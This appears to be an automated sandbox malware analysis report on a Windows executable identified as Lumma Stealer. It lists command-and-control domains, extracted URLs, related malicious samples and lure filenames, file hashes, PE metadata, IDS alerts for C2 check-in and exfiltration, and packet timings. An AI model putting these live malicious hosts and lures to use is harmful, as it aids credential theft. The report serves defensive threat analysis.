fadehairucw.store | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://necklacedmny.store/api | true | | unknown
presticitpo.store | true | | unknown
scriptyprefej.store | true | | unknown
necklacedmny.store | true | | unknown
fadehairucw.store | true | | unknown
navygenerayk.store | true | | unknown
founpiuer.store | true | | unknown
thumbystriw.store | true | | unknown
crisiwarny.store | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store:443/apiK | file.exe, 00000000.00000002.2294200437.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://necklacedmny.store/apiC | file.exe, 00000000.00000003.2211518965.00000000058F0000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/ac/?q= | file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189. | file.exe, 00000000.00000003.2228118803.00000000058F3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi | file.exe, 00000000.00000003.2228118803.00000000058F3000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0 | file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store/apiS | file.exe, 00000000.00000003.2211518965.00000000058F0000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ocsp.rootca1.amazontrust.com0: | file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://www.ecosia.org/newtab/ | file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg | file.exe, 00000000.00000003.2228118803.00000000058F3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | file.exe, 00000000.00000003.2227771592.0000000005A01000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_ | file.exe, 00000000.00000003.2228118803.00000000058F3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ac.ecosia.org/autocomplete?q= | file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store/X | file.exe, 00000000.00000003.2211713187.0000000000F92000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://necklacedmny.store/ | file.exe, 00000000.00000002.2294200437.0000000000F41000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2211713187.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294200437.0000000000EF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2198903513.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294200437.0000000000F91000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | file.exe, 00000000.00000003.2228118803.00000000058F3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store:443/api.default-release/key4.dbPK | file.exe, 00000000.00000002.2294200437.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp | false
                                                            unknown
                                                            http://x1.c.lencr.org/0file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://x1.i.lencr.org/0file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3file.exe, 00000000.00000003.2228118803.00000000058F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://necklacedmny.store/Hfile.exe, 00000000.00000002.2294200437.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://necklacedmny.store/apipfile.exe, 00000000.00000002.2294200437.0000000000F41000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270741632.0000000000F99000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2288823700.0000000000FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.2227771592.0000000005A01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://www.mozilla.orfile.exe, 00000000.00000003.2228046825.000000000591B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctafile.exe, 00000000.00000003.2228118803.00000000058F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://necklacedmny.store:443/apifile.exe, 00000000.00000002.2294200437.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.96.3 | necklacedmny.store | European Union | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1545194
Start date and time: 2024-10-30 08:21:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 13s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@5/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target file.exe, PID 1408 because there are no executed functions
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: file.exe
Time | Type | Description
03:22:09 | API Interceptor | 10x Sleep call for process: file.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
188.114.96.3 | Payment Slip_SJJ023639#U00faPDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/CEqTVkxM/download
188.114.96.3 | 0JLWNg4Sz1.exe | malicious | DCRat, PureLog Stealer, zgRAT | 977255cm.nyashkoon.in/secureWindows.php
188.114.96.3 | zxalphamn.doc | malicious | Lokibot | touxzw.ir/alpha2/five/fre.php
188.114.96.3 | QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/jI82Ms6K/download
188.114.96.3 | 9D7RwuJrth.exe | malicious | DCRat, PureLog Stealer, zgRAT | 304773cm.n9shteam.in/jscpuGamegeneratorprivate.php
188.114.96.3 | DBUfLVzZhf.exe | malicious | JohnWalkerTexasLoader | xilloolli.com/api.php?status=1&wallets=0&av=1
188.114.96.3 | R5AREmpD4S.exe | malicious | JohnWalkerTexasLoader | xilloolli.com/api.php?status=1&wallets=0&av=1
188.114.96.3 | 7950COPY.exe | malicious | FormBook | www.globaltrend.xyz/b2h2/
188.114.96.3 | transferencia interbancaria_667553466579.xlam.xlsx | malicious | AgentTesla | paste.ee/d/Gitmx
188.114.96.3 | 19387759999PO-RFQ-INVOICE-doc.exe | malicious | FormBook | www.zonguldakescortg.xyz/483l/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
necklacedmny.store | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 188.114.96.3
necklacedmny.store | file.exe | malicious | LummaC | 188.114.96.3
necklacedmny.store | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.96.3
necklacedmny.store | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 188.114.97.3
necklacedmny.store | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.97.3
necklacedmny.store | file.exe | malicious | LummaC | 188.114.96.3
necklacedmny.store | file.exe | malicious | LummaC | 188.114.97.3
necklacedmny.store | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.96.3
necklacedmny.store | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.97.3
necklacedmny.store | file.exe | malicious | LummaC | 188.114.97.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | na.doc | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
CLOUDFLARENETUS | Payment&WarantyBonds.exe | malicious | FormBook | 172.67.154.67
CLOUDFLARENETUS | PO.2407010.xls | malicious | HTMLPhisher, Lokibot | 104.21.74.191
CLOUDFLARENETUS | ADJUNTA.vbs | malicious | GuLoader, Snake Keylogger | 188.114.97.3
CLOUDFLARENETUS | File07098.PDF.exe | malicious | Snake Keylogger | 188.114.96.3
CLOUDFLARENETUS | Payment Slip_SJJ023639#U00faPDF.scr.exe | malicious | Snake Keylogger | 188.114.96.3
CLOUDFLARENETUS | lf1SPbZI3V.exe | malicious | Lokibot | 188.114.97.3
CLOUDFLARENETUS | PO-004976.xls | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | Po docs.xls | malicious | HTMLPhisher, Lokibot | 104.21.74.191
CLOUDFLARENETUS | PO-004976.xls | malicious | Unknown | 188.114.97.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | Orden de Compra.xlam.xlsx | malicious | Unknown | 188.114.96.3
a0e9f5d64349fb13191bc781f81f42e1 | Orden de compra.xlam.xlsx | malicious | Unknown | 188.114.96.3
a0e9f5d64349fb13191bc781f81f42e1 | z1SWIFT_MT103_Payment_552016_cmd.bat | malicious | DBatLoader, FormBook | 188.114.96.3
a0e9f5d64349fb13191bc781f81f42e1 | Order pdf.exe | malicious | DBatLoader, FormBook | 188.114.96.3
a0e9f5d64349fb13191bc781f81f42e1 | Proforma Fatura ektedir.exe | malicious | DBatLoader, FormBook | 188.114.96.3
a0e9f5d64349fb13191bc781f81f42e1 | PO-004976.xls | malicious | Unknown | 188.114.96.3
a0e9f5d64349fb13191bc781f81f42e1 | Order Pdf.exe | malicious | DBatLoader | 188.114.96.3
a0e9f5d64349fb13191bc781f81f42e1 | Transferencia.xls | malicious | Unknown | 188.114.96.3
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 188.114.96.3
a0e9f5d64349fb13191bc781f81f42e1 | Orden de Compra No. 434565344657.xlam.xlsx | malicious | Unknown | 188.114.96.3
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.5522317118284334
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 2'958'848 bytes
MD5: 65af596c495031434154ebb5e6eb462f
SHA1: 3173f8c46d141b5df11700b69b64a92fe4f85730
SHA256: e907eb01f5e06ae6692bae8a41628c3e754009316875627b594e090d380488d3
SHA512: baf7ff019cabda54b8bc209a95329b0fc50ca293eb925b8d4de64f55b3344b2c670b5cccb4d4db4864aa782f991dd000d145640b1cbb9d33933f760f1bf6d4a8
SSDEEP: 49152:8ANak92RptXgJ15sMyFRTiTQkwcyNrCVtJImvFsIHCfABchVijMN:/N/2RptXgJ15JyhilHzBcDijA
TLSH: 05D53A65B50571CFD08B17B8D66BCE829C5D43BD4B2009C39C6974BA7EA3EC121FAD28
                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J...........00...........@..........................`0.....e.-...@.................................T...h..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x703000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instruction (entrypoint preview): jmp 00007F92854D80AAh
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5a054 | 0x68 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x59000 | 0x340 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5a1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x58000 | 0x27e00 | 82c83ced7d47c2039c2eb064280b0fb2 | False | 0.9981081014890282 | data | 7.9797333055518855 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x59000 | 0x340 | 0x400 | 914cd139a383496d0085d499d138ef92 | False | 0.390625 | data | 4.997389973748798 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x5a000 | 0x1000 | 0x200 | 555a11fa24a077379003c187d9c9d020 | False | 0.14453125 | data | 0.9996515881509258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
lvdvpuxj | 0x5b000 | 0x2a7000 | 0x2a6c00 | c575ad8b032af3e64c1913478eafb879 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
foyvnwhq | 0x302000 | 0x1000 | 0x400 | e54e55d8810a060e44f0121d4c65c65c | False | 0.7314453125 | data | 5.8130454496196755 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x303000 | 0x3000 | 0x2200 | 3a7c0d3d0fd5f944344cd37ab92116ee | False | 0.0705422794117647 | DOS executable (COM) | 0.7483646215590711 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x59058 | 0x2e6 | XML 1.0 document, ASCII text, with CRLF line terminators | | | 0.45417789757412397
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-30T08:22:10.450006+0100 | 2057131 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) | 1 | 192.168.2.6 | 62744 | 1.1.1.1 | 53 | UDP
2024-10-30T08:22:10.469901+0100 | 2057129 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) | 1 | 192.168.2.6 | 62708 | 1.1.1.1 | 53 | UDP
2024-10-30T08:22:10.481879+0100 | 2057127 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) | 1 | 192.168.2.6 | 60505 | 1.1.1.1 | 53 | UDP
2024-10-30T08:22:10.496016+0100 | 2057125 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) | 1 | 192.168.2.6 | 54347 | 1.1.1.1 | 53 | UDP
2024-10-30T08:22:10.514628+0100 | 2057123 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) | 1 | 192.168.2.6 | 60730 | 1.1.1.1 | 53 | UDP
2024-10-30T08:22:11.163524+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.6 | 49710 | 188.114.96.3 | 443 | TCP
2024-10-30T08:22:11.689997+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49710 | 188.114.96.3 | 443 | TCP
2024-10-30T08:22:11.689997+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49710 | 188.114.96.3 | 443 | TCP
2024-10-30T08:22:12.359132+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.6 | 49711 | 188.114.96.3 | 443 | TCP
2024-10-30T08:22:12.907514+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.6 | 49711 | 188.114.96.3 | 443 | TCP
2024-10-30T08:22:12.907514+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49711 | 188.114.96.3 | 443 | TCP
2024-10-30T08:22:13.763866+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.6 | 49713 | 188.114.96.3 | 443 | TCP
2024-10-30T08:22:14.287670+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.6 | 49713 | 188.114.96.3 | 443 | TCP
2024-10-30T08:22:14.983235+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.6 | 49719 | 188.114.96.3 | 443 | TCP
2024-10-30T08:22:16.565849+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.6 | 49725 | 188.114.96.3 | 443 | TCP
2024-10-30T08:22:18.379285+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.6 | 49736 | 188.114.96.3 | 443 | TCP
2024-10-30T08:22:20.185206+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.6 | 49748 | 188.114.96.3 | 443 | TCP
2024-10-30T08:22:22.420516+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.6 | 49764 | 188.114.96.3 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 30, 2024 08:22:10.532677889 CET | 49710 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:10.532716036 CET | 443 | 49710 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:10.532785892 CET | 49710 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:10.535788059 CET | 49710 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:10.535804987 CET | 443 | 49710 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:11.163435936 CET | 443 | 49710 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:11.163523912 CET | 49710 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:11.165782928 CET | 49710 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:11.165793896 CET | 443 | 49710 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:11.166065931 CET | 443 | 49710 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:11.217024088 CET | 49710 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:11.220474958 CET | 49710 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:11.220489025 CET | 49710 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:11.220597982 CET | 443 | 49710 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:11.690046072 CET | 443 | 49710 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:11.690166950 CET | 443 | 49710 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:11.690238953 CET | 49710 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:11.691807985 CET | 49710 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:11.691828012 CET | 443 | 49710 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:11.691847086 CET | 49710 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:11.691853046 CET | 443 | 49710 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:11.744637012 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:11.744680882 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:11.744780064 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:11.745062113 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:11.745075941 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:12.359045982 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:12.359132051 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:12.424346924 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:12.424371004 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:12.424751997 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:12.426196098 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:12.426234961 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:12.426276922 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:12.907517910 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:12.907589912 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:12.907629967 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:12.907648087 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:12.907661915 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:12.907705069 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:12.907717943 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:12.908225060 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:12.908263922 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:12.908282995 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:12.908288002 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:12.908406973 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:12.908411980 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:12.951464891 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 30, 2024 08:22:13.025593042 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:13.025697947 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:13.025746107 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 30, 2024 08:22:13.025790930 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
